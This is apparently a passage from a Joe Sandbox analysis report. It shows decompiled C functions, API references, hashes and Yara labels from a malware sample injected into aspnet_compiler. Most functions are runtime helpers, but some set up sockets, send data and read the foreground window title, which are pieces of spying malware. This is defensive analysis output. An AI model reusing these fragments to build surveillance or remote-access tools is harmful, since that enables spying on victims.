                    • API String ID: 1818849710-0
                    • Opcode ID: 61de9578f52ee8f0e092330830a64b9a8e5eb202a0654fe1bc12343b251ebfa2
                    • Instruction ID: f68fcc0987728696b45baa029fbd8ba208f586d8d4f13f853052a764fd9765f2
                    • Opcode Fuzzy Hash: 61de9578f52ee8f0e092330830a64b9a8e5eb202a0654fe1bc12343b251ebfa2
                    • Instruction Fuzzy Hash: 13E06D72544308FFDF109FA0ED05FEA7BACEB04BA1F1040A5BF09E6191D2759E14A7A8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E00444A38(void* __ecx, long _a4) {
                    				void* __esi;
                    				void* _t4;
                    				void* _t6;
                    				void* _t7;
                    				long _t8;
                    
                    				_t7 = __ecx;
                    				_t8 = _a4;
                    				if(_t8 > 0xffffffe0) {
                    					L7:
                    					 *((intOrPtr*)(E0043EEAD())) = 0xc;
                    					__eflags = 0;
                    					return 0;
                    				}
                    				if(_t8 == 0) {
                    					_t8 = _t8 + 1;
                    				}
                    				while(1) {
                    					_t4 = RtlAllocateHeap( *0x470a5c, 0, _t8); // executed
                    					if(_t4 != 0) {
                    						break;
                    					}
                    					__eflags = E00443E46();
                    					if(__eflags == 0) {
                    						goto L7;
                    					}
                    					_t6 = E00441850(_t7, _t8, __eflags, _t8);
                    					_pop(_t7);
                    					__eflags = _t6;
                    					if(_t6 == 0) {
                    						goto L7;
                    					}
                    				}
                    				return _t4;
                    			}









                    APIs
                    • RtlAllocateHeap.NTDLL(00000000,00433B6F,?,P@,00437117,?,?,00000000,?,P@,0040D366,00433B6F,?,?,?,?), ref: 00444A6A
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID: P@
                    • API String ID: 1279760036-676759640
                    • Opcode ID: 9797f3068208b50acbf799f5f92ac938ca8f5a32afd615d80b0c57cacc916379
                    • Instruction ID: fd7924e8b65afa23adb338f609f8de03ed02b176ca6f4a568383a370c07dd500
                    • Opcode Fuzzy Hash: 9797f3068208b50acbf799f5f92ac938ca8f5a32afd615d80b0c57cacc916379
                    • Instruction Fuzzy Hash: 69E0ED31581220AAF7307A669C05B6B3A8C9BD17B1F195027AC19B2AD4CB28CD0082ED
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00409835(void* __ecx, char _a4) {
                    
                    				_t2 = __ecx + 0x60; // 0x4730a0
                    				E0040AE66(_t2,  &_a4);
                    				if( *((char*)(__ecx + 0x49)) == 0) {
                    					CreateThread(0, 0, E00409876, __ecx, 0, 0); // executed
                    				}
                    				return E00401EE9();
                    			}




                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateThread
                    • String ID: Cqt
                    • API String ID: 2422867632-953143165
                    • Opcode ID: 816f62b2a08f7929e319e9c8b7fa4dab219abdebc3aecd6f7c4b7e66061ccfe4
                    • Instruction ID: d85add00c6f42117d705990aaefaa63471e6bdc8539aebbfc732e64b21dd5a73
                    • Opcode Fuzzy Hash: 816f62b2a08f7929e319e9c8b7fa4dab219abdebc3aecd6f7c4b7e66061ccfe4
                    • Instruction Fuzzy Hash: EDE08CB24242156ED320A631DC44DFB7A9C9B01354F00883FB84691192DA34AD4887A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041A311(intOrPtr* __ecx) {
                    				struct _MEMORYSTATUSEX _v68;
                    				intOrPtr _t8;
                    
                    				_v68.dwLength = 0x40;
                    				GlobalMemoryStatusEx( &_v68); // executed
                    				 *__ecx = _v68.ullTotalPhys;
                    				_t8 = _v68.ullAvailPhys;
                    				 *((intOrPtr*)(__ecx + 4)) = _t8;
                    				return _t8;
                    			}






                    APIs
                    • GlobalMemoryStatusEx.KERNELBASE(?), ref: 0041A325
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: GlobalMemoryStatus
                    • String ID: @
                    • API String ID: 1890195054-2766056989
                    • Opcode ID: 0dbc19bfcd94d8fe6ca99b922c2f6ba12b8aacba69d254520a1911864a253c2a
                    • Instruction ID: 38d0445fa6610dd558ee3faa9e7677437f9bbe62d097060465829832e2d10611
                    • Opcode Fuzzy Hash: 0dbc19bfcd94d8fe6ca99b922c2f6ba12b8aacba69d254520a1911864a253c2a
                    • Instruction Fuzzy Hash: 90D017B58023189FCB20DFA8E905A8EBBFCEB08210F00416AEC49E3300E770A8018B84
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E00444A86(void* __ecx, void* _a4, long _a8) {
                    				void* __esi;
                    				void* _t4;
                    				long _t7;
                    				void* _t13;
                    				long _t15;
                    
                    				_t10 = __ecx;
                    				_t13 = _a4;
                    				if(_t13 != 0) {
                    					_t15 = _a8;
                    					__eflags = _t15;
                    					if(_t15 != 0) {
                    						__eflags = _t15 - 0xffffffe0;
                    						if(_t15 <= 0xffffffe0) {
                    							while(1) {
                    								_t4 = RtlReAllocateHeap( *0x470a5c, 0, _t13, _t15); // executed
                    								__eflags = _t4;
                    								if(_t4 != 0) {
                    									break;
                    								}
                    								__eflags = E00443E46();
                    								if(__eflags == 0) {
                    									goto L5;
                    								}
                    								_t7 = E00441850(_t10, _t15, __eflags, _t15);
                    								_pop(_t10);
                    								__eflags = _t7;
                    								if(_t7 == 0) {
                    									goto L5;
                    								}
                    							}
                    							L7:
                    							return _t4;
                    						}
                    						L5:
                    						 *((intOrPtr*)(E0043EEAD())) = 0xc;
                    						L6:
                    						_t4 = 0;
                    						__eflags = 0;
                    						goto L7;
                    					}
                    					E00445002(_t13);
                    					goto L6;
                    				}
                    				return E00444A38(__ecx, _a8);
                    			}









                    APIs
                    • _free.LIBCMT ref: 00444AA7
                      • Part of subcall function 00444A38: RtlAllocateHeap.NTDLL(00000000,00433B6F,?,P@,00437117,?,?,00000000,?,P@,0040D366,00433B6F,?,?,?,?), ref: 00444A6A
                    • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,0043180D,00000000,0000000F,0042E217,?,?,004302BE,?,?,00000000), ref: 00444AE3
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap$_free
                    • String ID:
                    • API String ID: 1482568997-0
                    • Opcode ID: 36f31b41252dabdd3ccd32d7c95e91fca07e2e5538f8792d367621ddf272ea40
                    • Instruction ID: 455c427813147b6f3d2efebb8123bf363e795c38cc092496033f2fe0a3bdb231
                    • Opcode Fuzzy Hash: 36f31b41252dabdd3ccd32d7c95e91fca07e2e5538f8792d367621ddf272ea40
                    • Instruction Fuzzy Hash: 76F0F632281215AAFB216A66AC01F6B379D9FC1B74F24412FF914B62D1DF2CCC0041AD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041B45A(void* __ecx, long __edx) {
                    				char _v8;
                    				char _v32;
                    				void* __ebp;
                    				long _t10;
                    				void* _t18;
                    				void* _t27;
                    				void* _t29;
                    
                    				_t26 = __edx;
                    				_t27 = __ecx;
                    				E004020BF(_t18,  &_v32);
                    				_t10 = FormatMessageA(0x1100, 0, __edx, 0x400,  &_v8, 0, 0); // executed
                    				if(_t10 != 0) {
                    					L00405A86(_t18,  &_v32, _t26, _v8);
                    					LocalFree(_v8);
                    					E00402035(_t18, _t27, _t29, __eflags,  &_v32);
                    				} else {
                    					E00402073(_t18, _t27, _t26, _t29, 0x464074);
                    				}
                    				E00401FB8();
                    				return _t27;
                    			}











                    APIs
                    • FormatMessageA.KERNELBASE(00001100,00000000,00000000,00000400,?,00000000,00000000,00472EE0,00472EE0), ref: 0041B482
                    • LocalFree.KERNEL32(?,?), ref: 0041B4A8
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: FormatFreeLocalMessage
                    • String ID:
                    • API String ID: 1427518018-0
                    • Opcode ID: 1328b3594f48dd1c6b2aaf156e976a7ae102f3e449e780a0b7836d532136a00d
                    • Instruction ID: 6c993a8d8ec4289f23bd16f4b377e4c193b758fe99a849caa093818841c15766
                    • Opcode Fuzzy Hash: 1328b3594f48dd1c6b2aaf156e976a7ae102f3e449e780a0b7836d532136a00d
                    • Instruction Fuzzy Hash: 15F0A434B00209AADF18A766DD4ADFF762CDB84345B10417FB606B22D1EAB85E05C659
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E0040480D(char* __ecx) {
                    				intOrPtr _t14;
                    				char _t16;
                    				char* _t22;
                    
                    				_t22 = __ecx;
                    				if( *0x470abb != 0 || E0040487E() != 0) {
                    					_t14 =  *0x470adc; // 0xedf140
                    					__imp__#23( *((intOrPtr*)(_t14 + 4)), 1, 6); // executed
                    					 *((intOrPtr*)(_t22 + 4)) = _t14;
                    					if(_t14 == 0xffffffff) {
                    						goto L2;
                    					} else {
                    						_t16 =  *0x470ae4; // 0x1
                    						 *((char*)(_t22 + 0x5c)) = 0;
                    						 *((intOrPtr*)(_t22 + 0x60)) = 0;
                    						 *((intOrPtr*)(_t22 + 0x58)) = 0x3e8;
                    						 *((char*)(_t22 + 0x7d)) = 0;
                    						 *((char*)(_t22 + 1)) = _t16;
                    						 *((intOrPtr*)(_t22 + 0x4c)) = 0;
                    						 *((intOrPtr*)(_t22 + 0x50)) = 0;
                    						 *((intOrPtr*)(_t22 + 0x68)) = 0;
                    						 *((intOrPtr*)(_t22 + 0x70)) = 0;
                    						 *((intOrPtr*)(_t22 + 0x6c)) = 0;
                    						 *((intOrPtr*)(_t22 + 0x68)) = CreateEventW(0, 0, 1, 0);
                    						 *_t22 = 1;
                    						return 1;
                    					}
                    				} else {
                    					L2:
                    					return 0;
                    				}
                    			}







                    APIs
                    • socket.WS2_32(?,00000001,00000006), ref: 00404832
                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,004052EB,?,?,00000000,00000000,?,?,00000000,004051E8,?,00000000), ref: 0040486E
                      • Part of subcall function 0040487E: WSAStartup.WS2_32(00000202,00000000), ref: 00404893
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateEventStartupsocket
                    • String ID:
                    • API String ID: 1953588214-0
                    • Opcode ID: ffe2297606e416d6c3b5ccad3e5f88dc31d939aa0b0f85ed0b7fe91bade190d6
                    • Instruction ID: 59a91cd762d8530cb4f753689cd2647fba7b16dd7f4d7e7b9f20fabe365cb730
                    • Opcode Fuzzy Hash: ffe2297606e416d6c3b5ccad3e5f88dc31d939aa0b0f85ed0b7fe91bade190d6
                    • Instruction Fuzzy Hash: 200171B14087809FD7359F39B845697BFE0AB15304F048D6EF1DA97B91D3B1A481CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E0044205C(void* __ebx, void* __ecx) {
                    				void* _t2;
                    				intOrPtr _t3;
                    				signed int _t15;
                    				signed int _t16;
                    
                    				if( *0x4704e0 == 0) {
                    					_push(_t15);
                    					E0044D8D9(__ecx); // executed
                    					_t2 = E0044DBDA(); // executed
                    					_t19 = _t2;
                    					if(_t2 != 0) {
                    						_t3 = E00442109(__ebx, _t19);
                    						if(_t3 != 0) {
                    							 *0x4704ec = _t3;
                    							E00442471(0x4704e0, _t3);
                    							_t16 = 0;
                    						} else {
                    							_t16 = _t15 | 0xffffffff;
                    						}
                    						E00445002(0);
                    					} else {
                    						_t16 = _t15 | 0xffffffff;
                    					}
                    					E00445002(_t19);
                    					return _t16;
                    				} else {
                    					return 0;
                    				}
                    			}








                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 28729854537139cf2ef588ebbf1e600906cd533a01d3acd7e3f75a6007daa64c
                    • Instruction ID: b81e25f7d5918c7bd40ad8093da2d01db50d861b45bde7110f025ab76158fc47
                    • Opcode Fuzzy Hash: 28729854537139cf2ef588ebbf1e600906cd533a01d3acd7e3f75a6007daa64c
                    • Instruction Fuzzy Hash: F7E0A02660282155B631723BBE0AA6F01858BC173DF91422BFA24861C2DFAC4882819D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E0040163E(signed int _a4, signed int _a8, char _a12) {
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				signed int _v32;
                    				signed int _v36;
                    				signed int _v40;
                    				signed int _v44;
                    				signed int _v48;
                    				signed int _v52;
                    				signed int _v56;
                    				void* __esi;
                    				signed int _t64;
                    				signed int _t65;
                    				signed int _t67;
                    				signed int _t76;
                    				signed int _t87;
                    				signed int _t90;
                    				signed int _t91;
                    				signed int _t92;
                    				intOrPtr _t93;
                    				signed int _t94;
                    				signed int _t96;
                    				intOrPtr _t97;
                    				intOrPtr _t103;
                    				intOrPtr* _t105;
                    				intOrPtr* _t107;
                    				signed int _t108;
                    				signed int _t109;
                    				signed int _t111;
                    				signed int _t123;
                    				intOrPtr* _t125;
                    				signed int _t130;
                    				signed int _t132;
                    				signed int _t133;
                    				void* _t134;
                    				void* _t140;
                    				void* _t141;
                    				void* _t144;
                    				void* _t145;
                    
                    				_t108 = _a4;
                    				if(_t108 != 0) {
                    					_t65 = _t64 | 0xffffffff;
                    					_t123 = _t65 % _a8;
                    					__eflags = _t65 / _a8 - _t108;
                    					if(_t65 / _a8 >= _t108) {
                    						_t109 = _t108 * _a8;
                    						__eflags = _a12;
                    						if(__eflags == 0) {
                    							L8:
                    							_t67 = E00432DF5(_t123, _t134, __eflags, _t109); // executed
                    							_t111 = _t67;
                    							goto L9;
                    						} else {
                    							__eflags = _t109 - 0x1000;
                    							if(__eflags < 0) {
                    								goto L8;
                    							} else {
                    								_t69 = _t109 + 0x23;
                    								__eflags = _t109 + 0x23 - _t109;
                    								if(__eflags <= 0) {
                    									goto L3;
                    								} else {
                    									_t97 = E00432DF5(_t123, _t134, __eflags, _t69);
                    									_t11 = _t97 + 0x23; // 0x23
                    									_t111 = _t11 & 0xffffffe0;
                    									 *((intOrPtr*)(_t111 - 4)) = _t97;
                    									L9:
                    									return _t111;
                    								}
                    							}
                    						}
                    					} else {
                    						L3:
                    						_t140 = _t144;
                    						_t145 = _t144 - 0xc;
                    						E004334C8( &_v16);
                    						E004379F6( &_v16,  &E0046C37C);
                    						asm("int3");
                    						_push(_t140);
                    						_t141 = _t145;
                    						E004334FB( &_v32);
                    						E004379F6( &_v32,  &E0046C3B4);
                    						asm("int3");
                    						_push(_t141);
                    						 *0x46fd1c =  *0x46fd1c & 0x00000000;
                    						 *0x46f010 =  *0x46f010 | 1;
                    						_t76 = IsProcessorFeaturePresent(0xa);
                    						__eflags = _t76;
                    						if(_t76 != 0) {
                    							_v32 = _v32 & 0x00000000;
                    							 *0x46f010 =  *0x46f010 | 0x00000002;
                    							_push(_t134);
                    							 *0x46fd1c = 1;
                    							_t125 =  &_v56;
                    							_push(1);
                    							asm("cpuid");
                    							_pop(_t103);
                    							 *_t125 = 0;
                    							 *((intOrPtr*)(_t125 + 4)) = 1;
                    							 *((intOrPtr*)(_t125 + 8)) = 0;
                    							 *(_t125 + 0xc) = _t123;
                    							_v24 = _v56;
                    							_v16 = _v44 ^ 0x49656e69;
                    							_v20 = _v48 ^ 0x6c65746e;
                    							_push(1);
                    							asm("cpuid");
                    							_t105 =  &_v56;
                    							__eflags = _v52 ^ 0x756e6547 | _v16 | _v20;
                    							 *_t105 = 1;
                    							 *((intOrPtr*)(_t105 + 4)) = _t103;
                    							 *((intOrPtr*)(_t105 + 8)) = 0;
                    							 *(_t105 + 0xc) = _t123;
                    							if((_v52 ^ 0x756e6547 | _v16 | _v20) != 0) {
                    								L21:
                    								_t130 =  *0x46fd20; // 0x2
                    							} else {
                    								_t96 = _v56 & 0x0fff3ff0;
                    								__eflags = _t96 - 0x106c0;
                    								if(_t96 == 0x106c0) {
                    									L20:
                    									_t133 =  *0x46fd20; // 0x2
                    									_t130 = _t133 | 0x00000001;
                    									 *0x46fd20 = _t130;
                    								} else {
                    									__eflags = _t96 - 0x20660;
                    									if(_t96 == 0x20660) {
                    										goto L20;
                    									} else {
                    										__eflags = _t96 - 0x20670;
                    										if(_t96 == 0x20670) {
                    											goto L20;
                    										} else {
                    											__eflags = _t96 - 0x30650;
                    											if(_t96 == 0x30650) {
                    												goto L20;
                    											} else {
                    												__eflags = _t96 - 0x30660;
                    												if(_t96 == 0x30660) {
                    													goto L20;
                    												} else {
                    													__eflags = _t96 - 0x30670;
                    													if(_t96 != 0x30670) {
                    														goto L21;
                    													} else {
                    														goto L20;
                    													}
                    												}
                    											}
                    										}
                    									}
                    								}
                    							}
                    							__eflags = _v24 - 7;
                    							_v40 = _v44;
                    							_t87 = _v48;
                    							_v16 = _t87;
                    							_v36 = _t87;
                    							if(_v24 >= 7) {
                    								_t93 = 7;
                    								_push(_t105);
                    								asm("cpuid");
                    								_t107 =  &_v56;
                    								 *_t107 = _t93;
                    								 *((intOrPtr*)(_t107 + 4)) = _t105;
                    								 *((intOrPtr*)(_t107 + 8)) = 0;
                    								 *(_t107 + 0xc) = _t123;
                    								_t94 = _v52;
                    								__eflags = _t94 & 0x00000200;
                    								_v32 = _t94;
                    								_t87 = _v16;
                    								if((_t94 & 0x00000200) != 0) {
                    									_t132 = _t130 | 0x00000002;
                    									__eflags = _t132;
                    									 *0x46fd20 = _t132;
                    								}
                    							}
                    							__eflags = _t87 & 0x00100000;
                    							if((_t87 & 0x00100000) != 0) {
                    								 *0x46f010 =  *0x46f010 | 0x00000004;
                    								 *0x46fd1c = 2;
                    								__eflags = _t87 & 0x08000000;
                    								if((_t87 & 0x08000000) != 0) {
                    									__eflags = _t87 & 0x10000000;
                    									if((_t87 & 0x10000000) != 0) {
                    										asm("xgetbv");
                    										_v28 = _t87;
                    										_v24 = _t123;
                    										__eflags = (_v28 & 0x00000006) - 6;
                    										if((_v28 & 0x00000006) == 6) {
                    											__eflags = 0;
                    											if(0 == 0) {
                    												_t90 =  *0x46f010; // 0x2f
                    												_t91 = _t90 | 0x00000008;
                    												 *0x46fd1c = 3;
                    												__eflags = _v32 & 0x00000020;
                    												 *0x46f010 = _t91;
                    												if((_v32 & 0x00000020) != 0) {
                    													_t92 = _t91 | 0x00000020;
                    													__eflags = _t92;
                    													 *0x46fd1c = 5;
                    													 *0x46f010 = _t92;
                    												}
                    											}
                    										}
                    									}
                    								}
                    							}
                    						}
                    						__eflags = 0;
                    						return 0;
                    					}
                    				} else {
                    					return 0;
                    				}
                    			}












































                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: caff369a3e44734e3409fc0f357ce8361766cfd02b4466f25ae0342934686fc9
                    • Instruction ID: bcf894cbe7f558628445d92d8d60389314e0f69a1dd629ba4e5ad944aee8928b
                    • Opcode Fuzzy Hash: caff369a3e44734e3409fc0f357ce8361766cfd02b4466f25ae0342934686fc9
                    • Instruction Fuzzy Hash: 73F027B02042016BCB1C9B34CD5062A37969B98356F248F3FF01BD61E0DB3ACC85C60D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041A5F1(void* __ebx, void* __ecx, void* __edi) {
                    				short _v516;
                    				void* __ebp;
                    				struct HWND__* _t6;
                    				void* _t15;
                    				void* _t17;
                    				void* _t18;
                    
                    				_t17 = __ecx;
                    				E00435760(__edi,  &_v516, 0, 0x200);
                    				_t6 = GetForegroundWindow(); // executed
                    				GetWindowTextW(_t6,  &_v516, 0x100);
                    				E0040415E(__ebx, _t17, _t15, _t18,  &_v516);
                    				return _t17;
                    			}










                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Window$ForegroundText
                    • String ID:
                    • API String ID: 29597999-0
                    • Opcode ID: cc985dfd2c6f17fb7626ae194c27c182724e299edbceae080d4803d02862944b
                    • Instruction ID: 9b8c2f1ab38f7637c2eaf53de506446bdcdd280578ab757f114b791c05ceb432
                    • Opcode Fuzzy Hash: cc985dfd2c6f17fb7626ae194c27c182724e299edbceae080d4803d02862944b
                    • Instruction Fuzzy Hash: 76E0D871A0032867E720B7A4AC4EFE5776C9704715F0400BABE18D2283EAB49904C7E4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E0044E954(void* __esi, void* __eflags) {
                    				intOrPtr _v12;
                    				void* __ecx;
                    				char _t16;
                    				void* _t17;
                    				void* _t26;
                    				void* _t28;
                    				void* _t30;
                    				char _t31;
                    				void* _t33;
                    				intOrPtr* _t35;
                    
                    				_push(_t26);
                    				_push(_t26);
                    				_t16 = E004443F4(_t26, 0x40, 0x30); // executed
                    				_t31 = _t16;
                    				_v12 = _t31;
                    				_t28 = _t30;
                    				if(_t31 != 0) {
                    					_t2 = _t31 + 0xc00; // 0xc00
                    					_t17 = _t2;
                    					__eflags = _t31 - _t17;
                    					if(__eflags != 0) {
                    						_t3 = _t31 + 0x20; // 0x20
                    						_t35 = _t3;
                    						_t33 = _t17;
                    						do {
                    							_t4 = _t35 - 0x20; // 0x0
                    							E00447304(_t28, _t35, __eflags, _t4, 0xfa0, 0);
                    							 *(_t35 - 8) =  *(_t35 - 8) | 0xffffffff;
                    							 *_t35 = 0;
                    							_t35 = _t35 + 0x30;
                    							 *((intOrPtr*)(_t35 - 0x2c)) = 0;
                    							 *((intOrPtr*)(_t35 - 0x28)) = 0xa0a0000;
                    							 *((char*)(_t35 - 0x24)) = 0xa;
                    							 *(_t35 - 0x23) =  *(_t35 - 0x23) & 0x000000f8;
                    							 *((char*)(_t35 - 0x22)) = 0;
                    							__eflags = _t35 - 0x20 - _t33;
                    						} while (__eflags != 0);
                    						_t31 = _v12;
                    					}
                    				} else {
                    					_t31 = 0;
                    				}
                    				E00445002(0);
                    				return _t31;
                    			}














                    APIs
                      • Part of subcall function 004443F4: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446B4A,00000001,00000364,?,00000000,00000000,0043A556,00000000,00000000,?,0043A5DA,00000000), ref: 00444435
                    • _free.LIBCMT ref: 0044E9C0
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap_free
                    • String ID:
                    • API String ID: 614378929-0
                    • Opcode ID: e8cc168a206cb2f203358c90cc341d876996d2f60e2126ea3eb12d9ded59db87
                    • Instruction ID: b43b9af27dcddb4849891f15c6ca459ff88ab6a8378577c786593469fbe10df3
                    • Opcode Fuzzy Hash: e8cc168a206cb2f203358c90cc341d876996d2f60e2126ea3eb12d9ded59db87
                    • Instruction Fuzzy Hash: E201D6B22003456BF721CE6AD845D5AFBD9FB85374F25051EE584832C0EA34A906C678
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E004443F4(void* __ecx, signed int _a4, signed int _a8) {
                    				void* __esi;
                    				void* _t8;
                    				void* _t12;
                    				signed int _t13;
                    				void* _t15;
                    				signed int _t18;
                    				long _t19;
                    
                    				_t15 = __ecx;
                    				_t18 = _a4;
                    				if(_t18 == 0) {
                    					L2:
                    					_t19 = _t18 * _a8;
                    					if(_t19 == 0) {
                    						_t19 = _t19 + 1;
                    					}
                    					while(1) {
                    						_t8 = RtlAllocateHeap( *0x470a5c, 8, _t19); // executed
                    						if(_t8 != 0) {
                    							break;
                    						}
                    						__eflags = E00443E46();
                    						if(__eflags == 0) {
                    							L8:
                    							 *((intOrPtr*)(E0043EEAD())) = 0xc;
                    							__eflags = 0;
                    							return 0;
                    						}
                    						_t12 = E00441850(_t15, _t19, __eflags, _t19);
                    						_pop(_t15);
                    						__eflags = _t12;
                    						if(_t12 == 0) {
                    							goto L8;
                    						}
                    					}
                    					return _t8;
                    				}
                    				_t13 = 0xffffffe0;
                    				if(_t13 / _t18 < _a8) {
                    					goto L8;
                    				}
                    				goto L2;
                    			}











                    APIs
                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446B4A,00000001,00000364,?,00000000,00000000,0043A556,00000000,00000000,?,0043A5DA,00000000), ref: 00444435
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: fb9104f22dcedbe8120434fadbbdadfd72ec0fc3c5c24ebd2bf5bbd80fe2d0b8
                    • Instruction ID: 9d40b9d846304a4da4b5929be8e6dfedca74db581f7d738e17eab2e9df3cce7a
                    • Opcode Fuzzy Hash: fb9104f22dcedbe8120434fadbbdadfd72ec0fc3c5c24ebd2bf5bbd80fe2d0b8
                    • Instruction Fuzzy Hash: 14F0E931605234A6FB211E629C06B5B7748AFC17B5F148027FC09A7690CA28DC0186ED
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WSAStartup.WS2_32(00000202,00000000), ref: 00404893
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Startup
                    • String ID:
                    • API String ID: 724789610-0
                    • Opcode ID: 4b5b1acb0718588404019be5d9f15640a6bb1c21c3ccc0dc3f846b824dafbe4c
                    • Instruction ID: e98c7a7dcee344fb28133bcb2ee241acd4b45dcbdfc1a3ef5d864df1fc63b674
                    • Opcode Fuzzy Hash: 4b5b1acb0718588404019be5d9f15640a6bb1c21c3ccc0dc3f846b824dafbe4c
                    • Instruction Fuzzy Hash: 7ED012325AD7088EE610AAB8AD0F8A47B5CC313A15F0003BA6CB9835D3F640571CC2AB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: send
                    • String ID:
                    • API String ID: 2809346765-0
                    • Opcode ID: a8d70cb1d05a31d846f06bfe6dacdd29f23318bb0f64ab28444019d680c4d177
                    • Instruction ID: bfab3a08044aaf07d4c990dee58e7a6731fa9f306c9d2c0144e000b13adf200d
                    • Opcode Fuzzy Hash: a8d70cb1d05a31d846f06bfe6dacdd29f23318bb0f64ab28444019d680c4d177
                    • Instruction Fuzzy Hash: 56B092B9108302BFCA160B60DC0887A7EA6ABC8385B00882CF146411B0C636C460AB26
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00402787(intOrPtr _a4, intOrPtr _a8) {
                    				void* _t3;
                    				void* _t4;
                    				void* _t5;
                    				void* _t6;
                    
                    				_t4 = E00401694(_t3, _t5, _t6, _a4, _a8, 1); // executed
                    				return _t4;
                    			}







                    0x00402e0b
                    0x00402e13

                    APIs
                    • std::_Deallocate.LIBCONCRT ref: 00402E0B
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
